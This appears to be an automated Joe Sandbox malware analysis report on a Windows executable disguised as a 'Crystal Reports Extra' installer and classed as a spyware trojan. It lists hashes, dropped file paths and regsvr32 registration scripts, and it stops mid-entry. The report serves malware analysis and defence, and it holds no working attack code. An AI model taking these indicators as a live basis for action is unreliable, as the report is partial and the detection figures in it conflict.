                                                          Start date:28.09.2021
                                                          Start time:09:30:50
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 13m 58s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Sample file name:br4Cu3BycW.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Number of analysed new started processes analysed:22
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal76.troj.spyw.evad.winEXE@9/191@0/1
                                                          EGA Information:Failed
                                                          HDC Information:
                                                          • Successful, ratio: 33.6% (good quality ratio 32.8%)
                                                          • Quality average: 79.9%
                                                          • Quality standard deviation: 23.8%
                                                          HCA Information:Failed
                                                          Cookbook Comments:
                                                          • Adjust boot time
                                                          • Enable AMSI
                                                          • Found application associated with file extension: .exe
                                                          Warnings:
                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 20.54.110.249, 40.112.88.60, 173.222.108.210, 173.222.108.226, 20.199.120.151, 80.67.82.211, 80.67.82.235, 20.199.120.85
                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          Time | Type | Description
                                                          09:32:02 | API Interceptor | 1x Sleep call for process: CrystalReports.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASN

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\is-627NM.tmp\_isetup\_setup64.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6144
                                                          Entropy (8bit):4.720366600008286
                                                          Encrypted:false
                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Local\Temp\is-D30UI.tmp\_isetup\_setup64.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):6144
                                                          Entropy (8bit):4.720366600008286
                                                          Encrypted:false
                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                          MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                          SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                          SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                          SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Local\Temp\is-I744N.tmp\br4Cu3BycW.tmp
                                                          Process:C:\Users\user\Desktop\br4Cu3BycW.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3194368
                                                          Entropy (8bit):6.32732791778373
                                                          Encrypted:false
                                                          SSDEEP:49152:qEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTV+333TY:692bz2Eb6pd7B6bAGx7s333T
                                                          MD5:EEB69F7B86959AE72B9D37443FB7F3D0
                                                          SHA1:EA687885FF8711724639134819BFFFE3934E0CC1
                                                          SHA-256:5A3CCC92F7966F8A3F8D0FBC50CEF8452560341F4E23C769247B3CDD0818AF11
                                                          SHA-512:0EB7B152B595154B5221CC916A5AA79181E5EC5CF87D9CBEE734A2DD7E1512504AF19D2B857337A4CE956935E0A1C0E9E6BABB91AE5855EB9952523497538374
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          Process:C:\Users\user\Desktop\br4Cu3BycW.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3194368
                                                          Entropy (8bit):6.32732791778373
                                                          Encrypted:false
                                                          SSDEEP:49152:qEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTV+333TY:692bz2Eb6pd7B6bAGx7s333T
                                                          MD5:EEB69F7B86959AE72B9D37443FB7F3D0
                                                          SHA1:EA687885FF8711724639134819BFFFE3934E0CC1
                                                          SHA-256:5A3CCC92F7966F8A3F8D0FBC50CEF8452560341F4E23C769247B3CDD0818AF11
                                                          SHA-512:0EB7B152B595154B5221CC916A5AA79181E5EC5CF87D9CBEE734A2DD7E1512504AF19D2B857337A4CE956935E0A1C0E9E6BABB91AE5855EB9952523497538374
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\CrystalReports.exe (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4910592
                                                          Entropy (8bit):6.572031041695352
                                                          Encrypted:false
                                                          SSDEEP:49152:dYQUcTX0/fq7b81I89fNkiiD3khqwqREQDfqtd4keAG4/lqQNOhw5XlAzmGLateC:5zB7b8O8QZrjwwhw5XlACGm8CtxARti
                                                          MD5:11DD538F1BF5F174834DBA334964A691
                                                          SHA1:3B080FA94C71CFAB65A0CD407EACAC4C2B1B2378
                                                          SHA-256:1BC4B73613228169EF7F57222EF36A6D9B3A2F3347EFA2228C53DC3B83559888
                                                          SHA-512:8E0A0455BDECBA073B06BE610917C71B6082745DF91B34C2663BC8D86361E71EA8FFF3D222E087AA3560A1AEE3455CA1DC7F2957726D86B001F4124DE220F911
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 11%
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Docs\Quick Start.pdf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PDF document, version 1.4
                                                          Category:dropped
                                                          Size (bytes):101222
                                                          Entropy (8bit):6.983769460731426
                                                          Encrypted:false
                                                          SSDEEP:1536:loTqjohGkVSC9aZHu40Y7w58PxeVPM6b24k8frIP4T8m0qd4gBE:1lHfEU03kPm8m0qzBE
                                                          MD5:1BDDB792FEC19750CCBBB8352B2B8FFE
                                                          SHA1:DD300CB011E0D9ABD57F41503E31367167FDDD68
                                                          SHA-256:58045223424D936ADCEFC09C06F635C30A1AABA0335FC5D5954B43833B53FD72
                                                          SHA-512:1438030735AA9549E13B2E275210A9C6BB825329ACD568D8C38F8DEBE04474CE01BE5E44EF6B76913D47B59D33C58954615754CFFBCE67DE04F9CCBAA8341631
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Docs\is-PSH61.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PDF document, version 1.4
                                                          Category:dropped
                                                          Size (bytes):101222
                                                          Entropy (8bit):6.983769460731426
                                                          Encrypted:false
                                                          SSDEEP:1536:loTqjohGkVSC9aZHu40Y7w58PxeVPM6b24k8frIP4T8m0qd4gBE:1lHfEU03kPm8m0qzBE
                                                          MD5:1BDDB792FEC19750CCBBB8352B2B8FFE
                                                          SHA1:DD300CB011E0D9ABD57F41503E31367167FDDD68
                                                          SHA-256:58045223424D936ADCEFC09C06F635C30A1AABA0335FC5D5954B43833B53FD72
                                                          SHA-512:1438030735AA9549E13B2E275210A9C6BB825329ACD568D8C38F8DEBE04474CE01BE5E44EF6B76913D47B59D33C58954615754CFFBCE67DE04F9CCBAA8341631
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\FileHelpers.DLL (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):147456
                                                          Entropy (8bit):5.132194016685221
                                                          Encrypted:false
                                                          SSDEEP:3072:Ju6aJX0iugleTtmPzeLmQlV9MxSh356/JwQ3QklkuSmpKFb4NbkR2:9aJX0i9PaLmQlVxhw53w5bsbk
                                                          MD5:D817A6EC84CC47899F249B2C03B5F985
                                                          SHA1:5EBF96041A694C85BAD7F71F0679F64700EE272E
                                                          SHA-256:0A5DC4026BCEEB4AFDDDD73E3E16CC7224B2640E86A379D9AFE6E5A81CE1ECDC
                                                          SHA-512:96D161C7844304D4466384F5A25E27E54F0A79FEFC51E0656746837D31772EB84AB203E13686391B5FA0126F0F3C705876C1C1AE8EEF4E4F0EC67C8C379918A2
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 2%
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\LC.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):77824
                                                          Entropy (8bit):5.10431466984057
                                                          Encrypted:false
                                                          SSDEEP:1536:amAnsoKlNNzfkEMqqU+2bbbAV2/S2eVLVUJfKFjJ:aooKlNNQEMqqDL2/MJUJfKFjJ
                                                          MD5:6316C4082CACF8F3F4F22DAEF56CB15C
                                                          SHA1:CEA3DE90B20396B092797EC8C7E241E822C8FAED
                                                          SHA-256:5594B08C79A4D188A674713011CD516618FA36D2F988F7D353FB3370939A4062
                                                          SHA-512:E1E0A6440F91B208B61775E30D8FC1BE299A298E00ED564CA7C74FA8728738AF66E6C3C0805553ABBC4A8D2838CD21BFDE61AC2322FFF4E62AC4D6796A0821BC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\License.rtf (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:Rich Text Format data, version 1, ANSI
                                                          Category:dropped
                                                          Size (bytes):64156
                                                          Entropy (8bit):5.315320157680189
                                                          Encrypted:false
                                                          SSDEEP:768:zgv96cAAxEzYDlHnnDx2QAAw44RmkXOQQrWU0CW246jm/grBT8UojwKA7npBL4Cc:apRyHEQmtmMy4uIxju0TfTRY
                                                          MD5:8B1E3300D8671530E75C4EA201945457
                                                          SHA1:A7933AE925175F0CF6876506F56583CBBC18E966
                                                          SHA-256:AB5E632345D9CED4F8BCB210BF6E0922A18479E0620943ACD613D7B5C68F473D
                                                          SHA-512:A58A7A2C473CF5E9D81664C30904C18A593C57A873EE9DFA20610594885BE54FB92DEC628DD3DC3D73C7D7F266B20C771447D9B1CD7D3FBA7B66526AE6157184
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-BME18.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):98
                                                          Entropy (8bit):4.1287617936786605
                                                          Encrypted:false
                                                          SSDEEP:3:5lF5lvXJlFQIdwqBlFQJUmdUlFQJoGLEd:NWId1e6qnKGwd
                                                          MD5:DB1BD76FF52FE427A03204673A307B12
                                                          SHA1:72232D601DBEEE8E448AF0CC41D2D517AA56296D
                                                          SHA-256:6C3CEFCA10C5E5676A6EF14E8CA472F8F0A11C3DED7391B14ACB24BF3D7B727C
                                                          SHA-512:1BD2065AC82F7D858EDED6EF3348D9D3CD5F5DFB2772D351B77F737A2378EAA7D7E05D6008A36A852647446FC60C9A388FA51E7A8F401C6C43FC287D70F10A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: regsvr32 /u /s LC.dll..regsvr32 /u /s em2vd.ax..regsvr32 /u /s el2ad.ax..regsvr32 /u /s elaudec.ax
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-D43R5.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):77824
                                                          Entropy (8bit):5.10431466984057
                                                          Encrypted:false
                                                          SSDEEP:1536:amAnsoKlNNzfkEMqqU+2bbbAV2/S2eVLVUJfKFjJ:aooKlNNQEMqqDL2/MJUJfKFjJ
                                                          MD5:6316C4082CACF8F3F4F22DAEF56CB15C
                                                          SHA1:CEA3DE90B20396B092797EC8C7E241E822C8FAED
                                                          SHA-256:5594B08C79A4D188A674713011CD516618FA36D2F988F7D353FB3370939A4062
                                                          SHA-512:E1E0A6440F91B208B61775E30D8FC1BE299A298E00ED564CA7C74FA8728738AF66E6C3C0805553ABBC4A8D2838CD21BFDE61AC2322FFF4E62AC4D6796A0821BC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-NST0V.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:Rich Text Format data, version 1, ANSI
                                                          Category:dropped
                                                          Size (bytes):64156
                                                          Entropy (8bit):5.315320157680189
                                                          Encrypted:false
                                                          SSDEEP:768:zgv96cAAxEzYDlHnnDx2QAAw44RmkXOQQrWU0CW246jm/grBT8UojwKA7npBL4Cc:apRyHEQmtmMy4uIxju0TfTRY
                                                          MD5:8B1E3300D8671530E75C4EA201945457
                                                          SHA1:A7933AE925175F0CF6876506F56583CBBC18E966
                                                          SHA-256:AB5E632345D9CED4F8BCB210BF6E0922A18479E0620943ACD613D7B5C68F473D
                                                          SHA-512:A58A7A2C473CF5E9D81664C30904C18A593C57A873EE9DFA20610594885BE54FB92DEC628DD3DC3D73C7D7F266B20C771447D9B1CD7D3FBA7B66526AE6157184
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: {\rtf1\ansi\ansicpg1251\uc1\deff0\stshfdbch0\stshfloch0\stshfhich0\stshfbi0\deflang1049\deflangfe1049{\fonttbl{\f0\froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f1\fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}{\f43\froman\fcharset0\fprq2{\*\panose 00000000000000000000}Garamond;}{\f75\fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial (W1){\*\falt Arial};}..{\f78\froman\fcharset0\fprq2 Times New Roman;}{\f76\froman\fcharset238\fprq2 Times New Roman CE;}{\f79\froman\fcharset161\fprq2 Times New Roman Greek;}{\f80\froman\fcharset162\fprq2 Times New Roman Tur;}..{\f81\froman\fcharset177\fprq2 Times New Roman (Hebrew);}{\f82\froman\fcharset178\fprq2 Times New Roman (Arabic);}{\f83\froman\fcharset186\fprq2 Times New Roman Baltic;}{\f84\froman\fcharset163\fprq2 Times New Roman (Vietnamese);}..{\f88\fswiss\fcharset0\fprq2 Arial;}{\f86\fswiss\fcharset238\fprq2 Arial CE;}{\f89\fswiss\fcharset161\fprq2 Arial Greek;}{\f90\fswiss\fcharset16
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\is-UREBA.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):88
                                                          Entropy (8bit):4.147114079371796
                                                          Encrypted:false
                                                          SSDEEP:3:5jFPvXJjFPwqBjFjmdUjFLGLEU:7b1/qKGwU
                                                          MD5:26CB1034EDD008ABD00D7A1F935B61C5
                                                          SHA1:2E45FDDD2280A14A96B8CB1ED8B8E4C9707F9C41
                                                          SHA-256:F4E0FBC265020D01AAF4F451FFD9319AB3742AEEF949AF7A38260790FF6E4670
                                                          SHA-512:EA300163B36C9EE397812B6DC4FBA07849014F6C57D5C2F07E243414C4EE1E156A4100D7EB4BC555AC48B3EDA2C7990D0329D3C1ADEDE29F54AE1FF7C17FB480
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: regsvr32 /s LC.dll..regsvr32 /s em2vd.ax..regsvr32 /s el2ad.ax..regsvr32 /s elaudec.ax..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\register.cmd (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):88
                                                          Entropy (8bit):4.147114079371796
                                                          Encrypted:false
                                                          SSDEEP:3:5jFPvXJjFPwqBjFjmdUjFLGLEU:7b1/qKGwU
                                                          MD5:26CB1034EDD008ABD00D7A1F935B61C5
                                                          SHA1:2E45FDDD2280A14A96B8CB1ED8B8E4C9707F9C41
                                                          SHA-256:F4E0FBC265020D01AAF4F451FFD9319AB3742AEEF949AF7A38260790FF6E4670
                                                          SHA-512:EA300163B36C9EE397812B6DC4FBA07849014F6C57D5C2F07E243414C4EE1E156A4100D7EB4BC555AC48B3EDA2C7990D0329D3C1ADEDE29F54AE1FF7C17FB480
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: regsvr32 /s LC.dll..regsvr32 /s em2vd.ax..regsvr32 /s el2ad.ax..regsvr32 /s elaudec.ax..
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Filters\unregister.cmd (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):98
                                                          Entropy (8bit):4.1287617936786605
                                                          Encrypted:false
                                                          SSDEEP:3:5lF5lvXJlFQIdwqBlFQJUmdUlFQJoGLEd:NWId1e6qnKGwd
                                                          MD5:DB1BD76FF52FE427A03204673A307B12
                                                          SHA1:72232D601DBEEE8E448AF0CC41D2D517AA56296D
                                                          SHA-256:6C3CEFCA10C5E5676A6EF14E8CA472F8F0A11C3DED7391B14ACB24BF3D7B727C
                                                          SHA-512:1BD2065AC82F7D858EDED6EF3348D9D3CD5F5DFB2772D351B77F737A2378EAA7D7E05D6008A36A852647446FC60C9A388FA51E7A8F401C6C43FC287D70F10A24
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: regsvr32 /u /s LC.dll..regsvr32 /u /s em2vd.ax..regsvr32 /u /s el2ad.ax..regsvr32 /u /s elaudec.ax
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\License.txt (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):15099
                                                          Entropy (8bit):4.490145322936716
                                                          Encrypted:false
                                                          SSDEEP:192:s4HVPM3N2zi6547iYOE6k+jLPv4IdQQXyAOiDaoL8HZwM3fxEq/Sl4eAxjf+6:s4Hmv7iE6kY4I9yAO2NL8OMBI4eAxTV
                                                          MD5:D13ADE1829C8B1A1621DB24D91F2D082
                                                          SHA1:A7BD24E809EF9BE6A37EF2BD01D23D4465E979DD
                                                          SHA-256:079952DC637DBAA9806C40A001BF5837079ADE9066F8AA18C80D23507B7E3DA3
                                                          SHA-512:33FCD64FB4881801AC269A4065C2223C0A02EEDD1132EDC0E92EF35CDCC96DB669676681C26FBF3605DD1E8982919BECA1E644935F0C2B39537CD8D2886F41BC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: GNU GENERAL PUBLIC LICENSE....Version 2, June 1991....Copyright (C) 1989, 1991 Free Software Foundation, Inc. 51 Franklin St, Fifth..Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute..verbatim copies of this license document, but changing it is not allowed.....Preamble....The licenses for most software are designed to take away your freedom to share..and change it. By contrast, the GNU General Public License is intended to..guarantee your freedom to share and change free software--to make sure the..software is free for all its users. This General Public License applies to most..of the Free Software Foundation's software and to any other program whose..authors commit to using it. (Some other Free Software Foundation software is..covered by the GNU Library General Public License instead.) You can apply it to..your programs, too.....When we speak of free software, we are referring to freedom, not price. Our..General Public Licenses are designed to make sure tha
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\Microsoft.ReportViewer.ProcessingObjectModel.dll (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):53248
                                                          Entropy (8bit):4.571289360851901
                                                          Encrypted:false
                                                          SSDEEP:384:Lo5zW/Z0L39rAzRdjfNnCuYE0myI+Stu1OooEoZj1ofV5dkn67vc6ea3bKyEeJPG:LorLSpl2HJ3orWB3F9JUsm/n
                                                          MD5:253BC53169AD46B1EAFB92982BA7268E
                                                          SHA1:3F2F8C6324480B1F39C7BC06B8503FEEDFE5DEF4
                                                          SHA-256:CA513F09B64F8E3DC8EE09663854ADF7E4E84544133D07A3A2EF55701ABFAD4C
                                                          SHA-512:AB6847F2B7E07E85D555B313D63F74D4E74E50EA09EF32FE427822A25ECA12264A49347428D32F42ED65C669C28DAC426310BBD401A21C03177BD9729CFB5E08
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\PDF_32x32.ico (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):25214
                                                          Entropy (8bit):4.039276211338556
                                                          Encrypted:false
                                                          SSDEEP:96:Vlc4sGlhLesCncGE45m8sPaxrOSzv1H29K1KgoJC+t6szu0NO0IPENMx9x4alGJa:DtrJZ6serDeJqMUf4JkYl6
                                                          MD5:0BF18ABDC53FC1AE4DB2545ABBB486FA
                                                          SHA1:A333D0AEB07C3996E65BB9DC0682415026131F99
                                                          SHA-256:D85FEE8448F26FC990D3C54CAED42CFFB98C06109F2D55F645FD0490E0DC25BA
                                                          SHA-512:AD8B1D960236A41290BE9A063B8FF1E2174DD1659C96B2A1712F8CEC39C28E073DE50AA1A087800FA7830796B42BC64CBD537354C33DE42D0151AB61B8237BE1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\enc.ico (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):25214
                                                          Entropy (8bit):3.9681804468286277
                                                          Encrypted:false
                                                          SSDEEP:192:FzvfVE74IjYKZ4FQfJ43urjtpQqP7xTTqWV:hC4IjYKZ4Fs7rjtpQa3
                                                          MD5:E149094555DD89FE88D8836A51090DE6
                                                          SHA1:EECE6539C9FAD65B0DAC035AEF6B9920866941B0
                                                          SHA-256:7D6206D8F7DA57BC2E4A69804CC5796A146AF98C920BB6801BBEBE4335B09E32
                                                          SHA-512:58524DAB052147CA5162F0992ED030FEC1203726DB1634FAFB0B92802787374EFCD0F5E4D2F20DD7A58C38F49D01A98E9C00FDA03E6370BA73F83A922BB54F14
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\ico48.ico (copy)
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 3 icons, 48x48, 16 colors, 4 bits/pixel, 48x48, 8 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):15086
                                                          Entropy (8bit):5.750409332348987
                                                          Encrypted:false
                                                          SSDEEP:96:VFv6swSQHlNxbFlswv1EhGRjI5iMGgqexHw3eugeEeNesDeP4eTe02eVtVe7eEDu:tOzVFlssuIlvMvQwXeuD0Udl47m6zk
                                                          MD5:423CA0B47B073150089226A3E616702E
                                                          SHA1:62C33784525890C31C6AC65E29D22E4D304025B3
                                                          SHA-256:1732898BCCE38FC7724677F884C7643BBA1CA690302831557A134E18035C4718
                                                          SHA-512:A9E94F8F9376DC3D736D9AB458A2F3DCBC753311849B69A927ABA969874A2B4CC78648247D4D44B407140FB884BDE69F3DFEE6B6AC0622B4C949B85642E59416
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\is-5TG90.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):25214
                                                          Entropy (8bit):4.039276211338556
                                                          Encrypted:false
                                                          SSDEEP:96:Vlc4sGlhLesCncGE45m8sPaxrOSzv1H29K1KgoJC+t6szu0NO0IPENMx9x4alGJa:DtrJZ6serDeJqMUf4JkYl6
                                                          MD5:0BF18ABDC53FC1AE4DB2545ABBB486FA
                                                          SHA1:A333D0AEB07C3996E65BB9DC0682415026131F99
                                                          SHA-256:D85FEE8448F26FC990D3C54CAED42CFFB98C06109F2D55F645FD0490E0DC25BA
                                                          SHA-512:AD8B1D960236A41290BE9A063B8FF1E2174DD1659C96B2A1712F8CEC39C28E073DE50AA1A087800FA7830796B42BC64CBD537354C33DE42D0151AB61B8237BE1
                                                          Malicious:false
                                                          Reputation:unknown
                                                          C:\Users\user\AppData\Roaming\Crystal Reports Extra\dat\is-60EIS.tmp
                                                          Process:C:\Users\user\AppData\Local\Temp\is-JN0LE.tmp\br4Cu3BycW.tmp
                                                          File Type:MS Windows icon resource - 9 icons, 48x48, 16 colors, 4 bits/pixel, 32x32, 16 colors, 4 bits/pixel
                                                          Category:dropped
                                                          Size (bytes):25214
                                                          Entropy (8bit):3.9681804468286277
                                                          Encrypted:false
                                                          SSDEEP:192:FzvfVE74IjYKZ4FQfJ43urjtpQqP7xTTqWV:hC4IjYKZ4Fs7rjtpQa3
